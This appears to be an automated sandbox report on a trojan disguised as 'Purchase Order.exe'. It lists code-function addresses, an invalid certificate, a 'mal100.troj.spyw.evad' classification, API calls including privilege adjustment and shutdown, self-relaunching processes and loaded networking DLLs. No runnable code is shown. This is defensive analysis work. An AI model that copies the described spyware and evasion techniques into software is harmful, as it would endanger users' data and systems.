Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D116D8 4_2_39D116D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1A9D8 4_2_39D1A9D8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D166DA 4_2_39D166DA
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D10DDF 4_2_39D10DDF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D191DF 4_2_39D191DF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1C1C0 4_2_39D1C1C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D104C0 4_2_39D104C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17EC0 4_2_39D17EC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D136C8 4_2_39D136C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1ECC8 4_2_39D1ECC8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D116C8 4_2_39D116C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1A9C8 4_2_39D1A9C8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1E7F1 4_2_39D1E7F1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D10DF0 4_2_39D10DF0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D191F0 4_2_39D191F0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D179F9 4_2_39D179F9
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D11FF8 4_2_39D11FF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1BCF8 4_2_39D1BCF8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D148FC 4_2_39D148FC
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1A4FF 4_2_39D1A4FF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1D4E0 4_2_39D1D4E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D11FE7 4_2_39D11FE7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D13FE8 4_2_39D13FE8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D166E8 4_2_39D166E8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1BCEC 4_2_39D1BCEC
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1F190 4_2_39D1F190
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D14D98 4_2_39D14D98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18398 4_2_39D18398
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1D998 4_2_39D1D998
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D16B9F 4_2_39D16B9F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D12D9E 4_2_39D12D9E
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D11280 4_2_39D11280
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D19B80 4_2_39D19B80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D12480 4_2_39D12480
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1F180 4_2_39D1F180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1C686 4_2_39D1C686
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18389 4_2_39D18389
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D12488 4_2_39D12488
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1C688 4_2_39D1C688
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D14D88 4_2_39D14D88
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1AE8F 4_2_39D1AE8F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1C1B1 4_2_39D1C1B1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D16BB0 4_2_39D16BB0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1ECB7 4_2_39D1ECB7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D196B8 4_2_39D196B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D136B8 4_2_39D136B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1AEA0 4_2_39D1AEA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D156A7 4_2_39D156A7
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D12DA8 4_2_39D12DA8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1D9A8 4_2_39D1D9A8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D196AC 4_2_39D196AC
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18851 4_2_39D18851
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1CB50 4_2_39D1CB50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D10950 4_2_39D10950
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D13B58 4_2_39D13B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1F658 4_2_39D1F658
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D11B58 4_2_39D11B58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1B358 4_2_39D1B358
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1DE5F 4_2_39D1DE5F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D10040 4_2_39D10040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17540 4_2_39D17540
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1CB40 4_2_39D1CB40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1F647 4_2_39D1F647
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1A048 4_2_39D1A048
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D13B48 4_2_39D13B48
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D15D48 4_2_39D15D48
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D11271 4_2_39D11271
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1DE70 4_2_39D1DE70
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D14478 4_2_39D14478
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17078 4_2_39D17078
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D10960 4_2_39D10960
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18860 4_2_39D18860
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D14469 4_2_39D14469
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D11B68 4_2_39D11B68
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1B368 4_2_39D1B368
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17068 4_2_39D17068
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D19B6F 4_2_39D19B6F
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D10011 4_2_39D10011
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1FB11 4_2_39D1FB11
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1A510 4_2_39D1A510
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D16210 4_2_39D16210
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18D17 4_2_39D18D17
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D15219 4_2_39D15219
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D12918 4_2_39D12918
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1D018 4_2_39D1D018
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1E800 4_2_39D1E800
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D15D05 4_2_39D15D05
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1D007 4_2_39D1D007
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D14908 4_2_39D14908
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17A08 4_2_39D17A08
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1290E 4_2_39D1290E
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1B830 4_2_39D1B830
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D17530 4_2_39D17530
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D13238 4_2_39D13238
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1E338 4_2_39D1E338
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1A038 4_2_39D1A038
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D16220 4_2_39D16220
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1FB20 4_2_39D1FB20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1B822 4_2_39D1B822
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D13229 4_2_39D13229
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D1E329 4_2_39D1E329
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D15228 4_2_39D15228
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D18D28 4_2_39D18D28
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3D0D0 4_2_39D3D0D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36A80 4_2_39D36A80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3E060 4_2_39D3E060
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D357C0 4_2_39D357C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D325C0 4_2_39D325C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D341E0 4_2_39D341E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30FE0 4_2_39D30FE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33B90 4_2_39D33B90
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D35180 4_2_39D35180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31F80 4_2_39D31F80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33BA0 4_2_39D33BA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D309A0 4_2_39D309A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34B40 4_2_39D34B40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31940 4_2_39D31940
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36760 4_2_39D36760
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33560 4_2_39D33560
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30360 4_2_39D30360
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36110 4_2_39D36110
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34500 4_2_39D34500
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31300 4_2_39D31300
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36120 4_2_39D36120
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D32F20 4_2_39D32F20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33EC0 4_2_39D33EC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30CC0 4_2_39D30CC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3F2C0 4_2_39D3F2C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D344F1 4_2_39D344F1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D35AE0 4_2_39D35AE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D328E0 4_2_39D328E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33880 4_2_39D33880
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30680 4_2_39D30680
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D3F2B0 4_2_39D3F2B0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D354A0 4_2_39D354A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D322A0 4_2_39D322A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D33240 4_2_39D33240
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D30040 4_2_39D30040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D36440 4_2_39D36440
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34E60 4_2_39D34E60
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31C60 4_2_39D31C60
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D39611 4_2_39D39611
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D35E00 4_2_39D35E00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D32C00 4_2_39D32C00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D34820 4_2_39D34820
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D31620 4_2_39D31620
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F1A0 4_2_39D4F1A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D41360 4_2_39D41360
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F4C0 4_2_39D4F4C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D47AE0 4_2_39D47AE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D409D0 4_2_39D409D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D429D0 4_2_39D429D0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4DBC0 4_2_39D4DBC0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A9C0 4_2_39D4A9C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D409C1 4_2_39D409C1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F7CF 4_2_39D4F7CF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4F7E0 4_2_39D4F7E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C5E0 4_2_39D4C5E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D493E0 4_2_39D493E0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A380 4_2_39D4A380
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4D580 4_2_39D4D580
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4BFA0 4_2_39D4BFA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48DA0 4_2_39D48DA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D41350 4_2_39D41350
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4CF40 4_2_39D4CF40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D49D40 4_2_39D49D40
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4EB60 4_2_39D4EB60
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48760 4_2_39D48760
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B960 4_2_39D4B960
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4FB00 4_2_39D4FB00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D49700 4_2_39D49700
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C900 4_2_39D4C900
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40508 4_2_39D40508
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B320 4_2_39D4B320
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48120 4_2_39D48120
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4E520 4_2_39D4E520
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C2C0 4_2_39D4C2C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D490C0 4_2_39D490C0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D404F9 4_2_39D404F9
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4DEE0 4_2_39D4DEE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4ACE0 4_2_39D4ACE0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40E98 4_2_39D40E98
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40E87 4_2_39D40E87
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4BC80 4_2_39D4BC80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48A80 4_2_39D48A80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4EE80 4_2_39D4EE80
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4C2B1 4_2_39D4C2B1
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A6A0 4_2_39D4A6A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4D8A0 4_2_39D4D8A0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4E840 4_2_39D4E840
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40040 4_2_39D40040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D48440 4_2_39D48440
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B640 4_2_39D4B640
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4D260 4_2_39D4D260
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4A060 4_2_39D4A060
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D40011 4_2_39D40011
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4E200 4_2_39D4E200
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D47E00 4_2_39D47E00
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4B000 4_2_39D4B000
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D4CC20 4_2_39D4CC20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39D49A20 4_2_39D49A20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1868 4_2_39EA1868
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1F50 4_2_39EA1F50
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1180 4_2_39EA1180
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0AA0 4_2_39EA0AA0
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2D20 4_2_39EA2D20
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA03B8 4_2_39EA03B8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2638 4_2_39EA2638
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1859 4_2_39EA1859
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1F41 4_2_39EA1F41
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA1170 4_2_39EA1170
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0A91 4_2_39EA0A91
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2D10 4_2_39EA2D10
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0040 4_2_39EA0040
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA0027 4_2_39EA0027
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA03A8 4_2_39EA03A8
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39EA2628 4_2_39EA2628
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39F81240 4_2_39F81240
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39F88D58 4_2_39F88D58
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_39F81E58 4_2_39F81E58
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: String function: 00402ACE appears 52 times
PE / OLE file has an invalid certificate
Source: Purchase Order.exe Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
Source: Purchase Order.exe, 00000004.00000002.3383976496.0000000036697000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Purchase Order.exe
Uses 32bit PE files
Source: Purchase Order.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/18@3/4
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 4_2_004032BF EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 4_2_004032BF
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_0040451A GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 0_2_0040451A
Source: C:\Users\user\Desktop\Purchase Order.exe Code function: 0_2_004020CD CoCreateInstance,MultiByteToWideChar, 0_2_004020CD
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\semirigorously Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Purchase Order.exe File created: C:\Users\user\AppData\Local\Temp\nsq3120.tmp Jump to behavior
Source: Purchase Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Order.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Purchase Order.exe Virustotal: Detection: 12%
Source: C:\Users\user\Desktop\Purchase Order.exe File read: C:\Users\user\Desktop\Purchase Order.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe"
Source: C:\Users\user\Desktop\Purchase Order.exe Process created: C:\Users\user\Desktop\Purchase Order.exe "C:\Users\user\Desktop\Purchase Order.exe" Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Purchase Order.exe Section loaded: mscoree.dll Jump to behavior
